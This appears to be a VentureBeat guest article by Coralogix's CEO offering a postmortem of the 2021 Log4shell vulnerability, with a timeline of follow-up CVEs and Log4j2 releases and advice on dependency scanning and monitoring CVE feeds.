Join top executives in San Francisco on July 11-12, to hear how leaders are integrating and optimizing AI investments for success. Learn More
This article was contributed by Ariel Assaraf, CEO of Coralogix
The Log4shell vulnerability was a fitting, panicked end to what was already a difficult year. Now that the initial panic is out of the way, and there are some tried and tested methods for detecting and mitigating the vulnerability — it is essential to stop and reflect on just what happened in those last few weeks of 2021. Specifically, to reflect on what went well and what could have gone better. What better way to do that than with a postmortem?
Overview & impact of the Log4shell vulnerability
The Log4shell vulnerability was a weakness in the JNDI lookup functionality of Log4j2, between version 2.0 and 2.14. This allowed an attacker, who had control over what was printed in the logs (for example, if the server prints out an HTTP header), to execute whatever code they liked.
Log4j2 is ubiquitous among applications and the libraries on which they depend, meaning that many applications were utilizing Log4j2 without realizing it. Even applications not written in Java often are hosted in web containers, meaning that a project can have no apparent dependency on Log4j2 and still be exposed. This resulted in a massive impact across nearly ever industries.
Join us in San Francisco on July 11-12, where top executives will share how they have integrated and optimized AI investments for success and avoided common pitfalls.
The root cause of the Log4shell vulnerability
The root cause was not a single event for an issue like this. The original feature made its way into the release without security scrutiny. The core contributors to Log4j2 have, no doubt, been reflecting on how they can improve their security assessment processes.
Libraries like Log4j2 are also large and complex, meaning that the vast majority of teams were not using the vulnerable JNDI lookup functionality. This malicious code made its way in because of the monolithic nature of these dependencies. A more composable approach to Log4j2 functionality might have significantly reduced the potential impact of the Log4j2 vulnerability. Still, it would have come at the cost of ease of use for those engineers who did depend on it.
So, what went well?
The response from the industry regarding the Log4shell vulnerability was immediate and effective. Open source communities created resources, drafted blog posts, and implemented patches. This effort enabled organizations to remain ahead of the curve and proactively mitigate problems rather than frantically reacting.
In addition, the core contributors to the Log4j2 library were incredibly diligent in their releases. While it was a bit of a bumpy ride (more on this later), they quickly iterated to a sensible release that was backward compatible with all but the vulnerable functionality.
These positives speak to the elegant beauty of the open source philosophy-focused communities of experts working for of an enormous pool of organizations. Sometimes they make mistakes, much like any engineering effort, but those mistakes are rapidly detected and fixed.
What didn’t go so well?
The obvious problem with the Log4shell vulnerability is the very nature of it. The code was baked into thousands of applications, and each one needed to be mitigated, tested, and deployed into production. For some organizations, this was normal. For others, they were still operating on slow release cycles, and this sudden change would have been a massive disturbance to their way of working.
There was also some confusion about the correct mitigation path during the incident as the understanding of the Log4shell vulnerability grew. Check out the timeline below to get a flavor of this confusion. This meant that organizations that had been proactive were then forced to go back and start again.
Timeline of events
December 9, 2021
The original Log4Shell vulnerability was found. Advice was given to mitigate this issue by setting the LOG4J_FORMAT_MSG_NO_LOOKUPS or setting its corresponding configuration flag. At the same time, version 2.15 was released which disabled this functionality by default.
December 14, 2021
A second vulnerability was found in version 2.15 of Log4j. This was a “denial of service” vulnerability, enabling malicious agents to slow down and ultimately halt targeted systems. The advice changed from setting a configuration value to an upgrade, to the newly released version 2.16. This CVE was initially rated relatively
low, 3.7/10, but was re-scored at 9.8/10, meaning organizations that had made a rather sensible risk-based decision were forced to pivot again and migrate.
December 17, 2021
A third vulnerability was found in version 2.16. This was another “denial of service” attack that had a similar effect to the previous vulnerability. To mitigate this, version 2.17 was released. Because of the relatively high score given to this CVE, 7.5/10, organizations were advised to migrate to version 2.17 as soon as possible.
December 28, 2021
A fourth vulnerability was found in version 2.17. This vulnerability was less severe than its predecessors (6.6/10) and required other parts of the target system to be already compromised. This latest vulnerability required that configuration was being loaded from a remote server, which meant it would not have as broad an impact. This led to the release of 2.17.1.
So what’s next?
There are some serious questions that need to be asked. Firstly, is the method of dependency management fit for purpose in a world of microservices, where the same dependency is copied across dozens, hundreds, or maybe thousands of instances
Secondly, is there a need to migrate to smaller, composable libraries rather than monolithic libraries that bring in a great deal of unwanted functionality? Most of the victims of this vulnerability were not using the JNDI lookup code in the first place. Engineers regularly smuggle in torrents of unnecessary and potentially hazardous code into their binaries, especially for languages like Java that frequently favor significant dependencies that can be heavily configured.
Finally, some measure of acceptance needs to come with these criticisms. Zero-day vulnerabilities will happen. They’re an inevitable result of sharing code, which is undoubtedly worth the risk. Your challenge is to decide what processes, technologies, and tooling you want to put in place to get you through the next one.
The trick is responding quickly, and there are things we can do to raise vulnerabilities to our attention promptly.
- Automatic Log4shell vulnerability scans
You can use libraries like Snyk to detect vulnerabilities in your dependencies automatically. You can also configure this to automatically fail your CI/CD pipelines if you want to prevent critical vulnerabilities from even being deployed. This is a very firm but powerful mechanism for preventing issues from being released.
- Follow CVE feeds
The CVE Twitter feed is a great way for you to keep on top of the vulnerabilities as they are released. This may be a lot of information for you to process, but you’ll know the awful ones by all the likes and retweets.
All in all
It was a complex few weeks for engineering teams all over the globe. Still, if this vulnerability has proven anything, the open source community is resilient to failure, extremely responsive, and diligent. While this was a severe vulnerability that will undoubtedly linger for years to come, it was quickly mitigated and contained by the rapid response from a community of focused and diligent engineers.
Ariel Assaraf is CEO of Coralogix
Welcome to the VentureBeat community!
DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation.
If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers.
You might even consider contributing an article of your own!